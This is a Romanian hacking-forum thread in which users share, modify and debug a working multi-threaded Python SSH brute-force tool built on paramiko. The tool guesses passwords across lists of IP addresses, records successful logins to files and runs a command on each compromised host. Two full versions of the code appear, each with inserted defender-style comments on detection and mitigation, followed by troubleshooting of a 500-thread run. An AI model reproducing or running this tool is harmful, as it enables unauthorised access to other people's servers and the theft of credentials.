kmkozeu Posted February 16, 2019 Report Posted February 16, 2019 Salut rst, am vazut o sursa de ssh bruteforce in python mai exact a lui @Elohim sursa ia usererele dintr-un fisier diferit si parolele din alt fisier is curios daca poate cineva sa o modifice sa ia din acelasi fisier mai exact ex: pass.txt in fisier sa fie " user:pass " sau "user pass " aveti sursa mai jos, thx
# Review note (defender's view): multi-threaded SSH password-guessing script
# built on paramiko (Python 2 syntax). What the code below produces:
#   * one SSH connection and one password authentication attempt per
#     (ip, user, password) triple, so the target's sshd auth log shows
#     failed-password entries coming from the same source address;
#   * after a successful login, a single exec request running `uname -a`;
#   * four local result files: raw.txt, valid.txt, nologins.txt and bad.txt.
#     Finding these on a host during incident response suggests the host was
#     used to run this script; valid.txt / raw.txt hold plaintext credentials.
# NOTE(review): paramiko's default client identification string starts with
# "SSH-2.0-paramiko_"; that comes from paramiko defaults, not from this file.
# Usual mitigations: key-based authentication with PasswordAuthentication
# disabled in sshd_config, a low MaxAuthTries, connection rate limiting,
# source-address restrictions, and alerting on bursts of failed logins.
import paramiko, sys, Queue, threading


class SSHBrute(threading.Thread):
    # Worker thread: takes (ip, user, passwd) triples from the shared queue.
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        # Endless loop: block on the queue, try one triple, mark it done.
        # The thread only ends with the process (brutemain sets daemon=True).
        while True:
            ip,user,passwd = self.queue.get()
            self.kraken(ip,user,passwd)
            self.queue.task_done()

    def kraken(self,ip,user,passwd):
        # Attempt one password login against `ip`. Returns True only when the
        # login succeeded and `uname -a` returned data; False otherwise.
        # Uses the module globals cracked, raw, val, nologs, bad and dbg that
        # brutemain() creates.
        try:
            # Hosts already recorded as valid are not tried again.
            if ip in cracked: return False
            # Placeholders in the password entry: %user% is replaced by the
            # user name, %User% by the title-cased user name plus suffix,
            # and the literal %null% stands for an empty password.
            if '%user%' in str(passwd):
                passwd = passwd.split("%")[0] + user + passwd.split("%")[2]
            if '%User%' in str(passwd):
                pwd = user + passwd.split("%")[2]
                passwd = passwd.split("%")[0]+pwd.title()
            if str(passwd) == '%null%':
                passwd = ''
            ssh = paramiko.SSHClient()
            # AutoAddPolicy: unknown host keys are accepted without checking.
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            ssh.connect(ip, username=user, password=passwd, timeout=35)
            # Reaching this line means authentication succeeded; the triple
            # is logged to raw.txt before the command check below.
            raw.write(ip+' '+user+' '+passwd+'\n')
            raw.flush()
            chan = ssh.get_transport().open_session()
            chan.settimeout(35)
            # Single command run on the target after login; it appears as an
            # exec request in the SSH session.
            chan.exec_command('uname -a')
            data = chan.recv(1024)
            if len(data) == 0:
                # Login accepted but no command output: recorded separately
                # in nologins.txt.
                nologs.write(ip+' '+user+' '+passwd+'\n')
                nologs.flush()
                return False
            # Format written to valid.txt: "ip user pass|<uname output>".
            val.write(ip+' '+user+' '+passwd+'|'+data.rstrip()+'\n')
            val.flush()
            cracked.append(ip)
            chan.close()
            ssh.close()
            return True
        except Exception, e:
            # Any exception whose text contains 'uthent' is treated as an
            # authentication failure; with the "bad" switch the ip is also
            # written to bad.txt.
            if 'uthent' in str(e):
                if dbg == 'bad':
                    bad.write(ip+'\n')
                    bad.flush()
                #print '\r[+]Tried '+ip+' '+user+' '+passwd+' '
                ssh.close()
                return False
            #print ip, str(e)
            ssh.close()
            return False


def brutemain():
    # Entry point. Command line, as read below: argv[1] thread count,
    # argv[2] ip file, argv[3] user file, argv[4] password file,
    # argv[5] filter switch ("bad" or "no").
    if len(sys.argv) < 2:
        print """ SSH Brute Force Tool Author: @Elohim [RST] Usage: bruter ThreadNumber IpFile UserFile PassFile FilterSwitch* *The filter Switch Takes Either the word "bad" or "no". 
If you supply the word bad, it filters in bad.txt only the ips which indeed support ssh AUTH and password didn't work"""
        return False
    ThreadNR = int(sys.argv[1])
    queue = Queue.Queue(maxsize=20000)
    try:
        i = 0
        for i in range(ThreadNR):
            t = SSHBrute(queue)
            t.daemon = True
            t.start()
            i += 1
    except Exception, e:
        print 'Cant start more than',i,'Threads!'
    # Shared state read by SSHBrute.kraken().
    global bad
    global val
    global nologs
    global cracked
    global raw
    cracked = []
    # bad.txt is truncated on start; the other three files are appended to.
    bad = open('bad.txt','w')
    val = open('valid.txt','a')
    nologs = open('nologins.txt','a')
    raw = open('raw.txt','a')
    with open(str(sys.argv[2]),'rU') as ipf:
        ips = ipf.read().splitlines()
    with open(str(sys.argv[3]),'rU') as uf:
        users = uf.read().splitlines()
    with open(str(sys.argv[4]),'rU') as pf:
        passwords = pf.read().splitlines()
    global dbg
    dbg = str(sys.argv[5])
    try:
        # Loop order is password, then user, then ip: one credential pair is
        # sent to every host before the next pair is used. Detection note:
        # attempts against any single host are spread out, so counting
        # failures per source address across all hosts is more reliable
        # than a per-host threshold.
        for password in passwords:
            for user in users:
                for ip in ips:
                    queue.put((ip,user,password))
    except:
        # Errors while enqueuing are silently ignored.
        pass
    # Wait until every queued triple has been marked done by a worker.
    queue.join()


if __name__ == "__main__":
    brutemain()
Quote
Turry Posted February 16, 2019
Faci o singura variabila in care tii toate combo-urile id:pass. Dupa aceea faci un loop peste combo-uri, faci un split(":") si salvezi primul element in lista cu ID-uri si al doilea element in lista cu pass-uri.
Active Members MrGrj Posted February 16, 2019 Active Members Report Posted February 16, 2019
# Review note (defender's view): variant of the script from the first post
# that reads "user:pass" pairs from one file (argv[3]) instead of separate
# user and password files. Network behaviour is unchanged: one SSH password
# authentication attempt per (ip, user, password) triple and, after a
# successful login, one exec request running `uname -a`. Results go to
# raw.txt, valid.txt, nologins.txt and bad.txt in the working directory;
# those file names are a useful artefact to look for during incident response.
# Usual mitigations: key-based authentication with PasswordAuthentication
# disabled in sshd_config, a low MaxAuthTries, connection rate limiting and
# alerting on bursts of failed logins from one source.
import Queue
import paramiko
import sys
import threading


class SSHBrute(threading.Thread):
    # Worker thread: takes (ip, user, passwd) triples from the shared queue.
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        # Endless loop: block on the queue, try one triple, mark it done.
        while True:
            ip, user, passwd = self.queue.get()
            self.kraken(ip, user, passwd)
            self.queue.task_done()

    def kraken(self, ip, user, passwd):
        # Attempt one password login against `ip`. Returns True only when the
        # login succeeded and `uname -a` returned data; False otherwise.
        # In this variant the list and the four file handles are locals,
        # created again on every call.
        cracked = []
        bad = open('bad.txt', 'w')
        val = open('valid.txt', 'a')
        nologs = open('nologins.txt', 'a')
        raw = open('raw.txt', 'a')
        # Filter switch read from the command line on each call; raises
        # IndexError when sys.argv has fewer than five entries.
        dbg = str(sys.argv[4])
        try:
            if ip in cracked:
                return False
            # Placeholders in the password entry: %user% is replaced by the
            # user name, %User% by the title-cased user name plus suffix,
            # and the literal %null% stands for an empty password.
            if '%user%' in str(passwd):
                passwd = '{}{}{}'.format(passwd.split("%")[0], user, passwd.split("%")[2])
            if '%User%' in str(passwd):
                pwd = '{}{}'.format(user, passwd.split("%")[2])
                passwd = '{}{}'.format(passwd.split("%")[0], pwd.title())
            if str(passwd) == '%null%':
                passwd = ''
            ssh = paramiko.SSHClient()
            # AutoAddPolicy: unknown host keys are accepted without checking.
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            ssh.connect(ip, username=user, password=passwd, timeout=35)
            # Reaching this line means authentication succeeded.
            raw.write(ip + ' ' + user + ' ' + passwd + '\n')
            raw.flush()
            chan = ssh.get_transport().open_session()
            chan.settimeout(35)
            # Single command run on the target after login.
            chan.exec_command('uname -a')
            data = chan.recv(1024)
            if len(data) == 0:
                # Login accepted but no command output: nologins.txt.
                nologs.write('{} {} {}\n'.format(ip, user, passwd))
                nologs.flush()
                return False
            # Format written to valid.txt: "ip user pass|<uname output>".
            val.write('{} {} {}|{}\n'.format(ip, user, passwd, data.rstrip()))
            val.flush()
            cracked.append(ip)
            chan.close()
            ssh.close()
            return True
        except Exception as e:
            # Exceptions whose text contains 'uthent' are treated as
            # authentication failures.
            if 'uthent' in str(e):
                if dbg == 'bad':
                    bad.write(ip + '\n')
                    bad.flush()
                ssh.close()
                return False
            ssh.close()
            return False


def brutemain():
    # Entry point. argv[1] thread count, argv[2] ip file, argv[3] file of
    # "user:pass" lines; kraken() additionally reads argv[4].
    if len(sys.argv) < 2:
        return False
    ThreadNR = int(sys.argv[1])
    queue = Queue.Queue(maxsize=20000)
    try:
        i = 0
        for i in range(ThreadNR):
            t = SSHBrute(queue)
            t.daemon = True
            t.start()
            i += 1
    except Exception as e:
        print('Cant start more than {} threads because: {}.'.format(i, e))
    with open(str(sys.argv[2]), 'rU') as ipf:
        ips = ipf.read().splitlines()
    with open(str(sys.argv[3]), 'rU') as uf:
        users_and_passwds = uf.read().splitlines()
    try:
        # Each line is split on ':'; field 0 is the user, field 1 the
        # password. Every pair is queued for every ip before the next pair,
        # so attempts against a single host are spread out; counting failed
        # logins per source address across hosts detects this more reliably
        # than a per-host threshold.
        for user_and_pass in users_and_passwds:
            for ip in ips:
                queue.put((ip, user_and_pass.split(':')[0].strip(), user_and_pass.split(':')[1].strip()))
    except Exception as e:
        print('Exception raised: {}'.format(e))
        pass
    # Wait until every queued triple has been marked done by a worker.
    queue.join()


if __name__ == "__main__":
    brutemain()
Quote
kmkozeu Posted February 16, 2019 Author Report Posted February 16, 2019 5 hours ago, MrGrj said: import Queue import paramiko import sys import threading class SSHBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: ip, user, passwd = self.queue.get() self.kraken(ip, user, passwd) self.queue.task_done() def kraken(self, ip, user, passwd): cracked = [] bad = open('bad.txt', 'w') val = open('valid.txt', 'a') nologs = open('nologins.txt', 'a') raw = open('raw.txt', 'a') dbg = str(sys.argv[4]) try: if ip in cracked: return False if '%user%' in str(passwd): passwd = '{}{}{}'.format(passwd.split("%")[0], user, passwd.split("%")[2]) if '%User%' in str(passwd): pwd = '{}{}'.format(user, passwd.split("%")[2]) passwd = '{}{}'.format(passwd.split("%")[0], pwd.title()) if str(passwd) == '%null%': passwd = '' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, username=user, password=passwd, timeout=35) raw.write(ip + ' ' + user + ' ' + passwd + '\n') raw.flush() chan = ssh.get_transport().open_session() chan.settimeout(35) chan.exec_command('uname -a') data = chan.recv(1024) if len(data) == 0: nologs.write('{} {} {}\n'.format(ip, user, passwd)) nologs.flush() return False val.write('{} {} {}|{}\n'.format(ip, user, passwd, data.rstrip())) val.flush() cracked.append(ip) chan.close() ssh.close() return True except Exception as e: if 'uthent' in str(e): if dbg == 'bad': bad.write(ip + '\n') bad.flush() ssh.close() return False ssh.close() return False def brutemain(): if len(sys.argv) < 2: return False ThreadNR = int(sys.argv[1]) queue = Queue.Queue(maxsize=20000) try: i = 0 for i in range(ThreadNR): t = SSHBrute(queue) t.daemon = True t.start() i += 1 except Exception as e: print('Cant start more than {} threads because: {}.'.format(i, e)) with open(str(sys.argv[2]), 'rU') as ipf: ips = ipf.read().splitlines() with open(str(sys.argv[3]), 'rU') as uf: 
users_and_passwds = uf.read().splitlines() try: for user_and_pass in users_and_passwds: for ip in ips: queue.put((ip, user_and_pass.split(':')[0].strip(), user_and_pass.split(':')[1].strip())) except Exception as e: print('Exception raised: {}'.format(e)) pass queue.join() if __name__ == "__main__": brutemain() File "t.py", line 16 self.queue.task_done()? ^ SyntaxError: invalid syntax Quote
kmkozeu Posted February 16, 2019 Author Report Posted February 16, 2019 (edited) 6 hours ago, MrGrj said: import Queue import paramiko import sys import threading class SSHBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: ip, user, passwd = self.queue.get() self.kraken(ip, user, passwd) self.queue.task_done() def kraken(self, ip, user, passwd): cracked = [] bad = open('bad.txt', 'w') val = open('valid.txt', 'a') nologs = open('nologins.txt', 'a') raw = open('raw.txt', 'a') dbg = str(sys.argv[4]) try: if ip in cracked: return False if '%user%' in str(passwd): passwd = '{}{}{}'.format(passwd.split("%")[0], user, passwd.split("%")[2]) if '%User%' in str(passwd): pwd = '{}{}'.format(user, passwd.split("%")[2]) passwd = '{}{}'.format(passwd.split("%")[0], pwd.title()) if str(passwd) == '%null%': passwd = '' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, username=user, password=passwd, timeout=35) raw.write(ip + ' ' + user + ' ' + passwd + '\n') raw.flush() chan = ssh.get_transport().open_session() chan.settimeout(35) chan.exec_command('uname -a') data = chan.recv(1024) if len(data) == 0: nologs.write('{} {} {}\n'.format(ip, user, passwd)) nologs.flush() return False val.write('{} {} {}|{}\n'.format(ip, user, passwd, data.rstrip())) val.flush() cracked.append(ip) chan.close() ssh.close() return True except Exception as e: if 'uthent' in str(e): if dbg == 'bad': bad.write(ip + '\n') bad.flush() ssh.close() return False ssh.close() return False def brutemain(): if len(sys.argv) < 2: return False ThreadNR = int(sys.argv[1]) queue = Queue.Queue(maxsize=20000) try: i = 0 for i in range(ThreadNR): t = SSHBrute(queue) t.daemon = True t.start() i += 1 except Exception as e: print('Cant start more than {} threads because: {}.'.format(i, e)) with open(str(sys.argv[2]), 'rU') as ipf: ips = ipf.read().splitlines() with open(str(sys.argv[3]), 'rU') as 
uf: users_and_passwds = uf.read().splitlines() try: for user_and_pass in users_and_passwds: for ip in ips: queue.put((ip, user_and_pass.split(':')[0].strip(), user_and_pass.split(':')[1].strip())) except Exception as e: print('Exception raised: {}'.format(e)) pass queue.join() if __name__ == "__main__": brutemain() am rezolvat problema de mai sus, erau pusi ? la sfarsit la 2 linii, acum am alta problema mai exact eroarea asta cate thread-uri pun de atatea ori o da. root@mail:/home/administrator# python t.py 500 ips pass Exception in thread Thread-26: Traceback (most recent call last): File "/usr/lib/python2.7/threading.py", line 810, in __bootstrap_inner self.run() File "t.py", line 15, in run self.kraken(ip, user, passwd) File "t.py", line 24, in kraken dbg = str(sys.argv[4]) IndexError: list index out of range si asta No handlers could be found for logger "paramiko.transport" Edited February 16, 2019 by kmkozeu Quote
MrGrj (Active Members) Posted February 19, 2019
On 2/16/2019 at 8:55 PM, kmkozeu said:
File "t.py", line 24, in kraken dbg = str(sys.argv[4])
Trebuie sa mai pui un argument la sfarsitul comenzii:
python t.py 500 ips pass bad # adauga asta ^^^
On 2/16/2019 at 8:55 PM, kmkozeu said:
No handlers could be found for logger "paramiko.transport"
Trebuie sa adaugi asta:
paramiko.util.log_to_file("filename.log")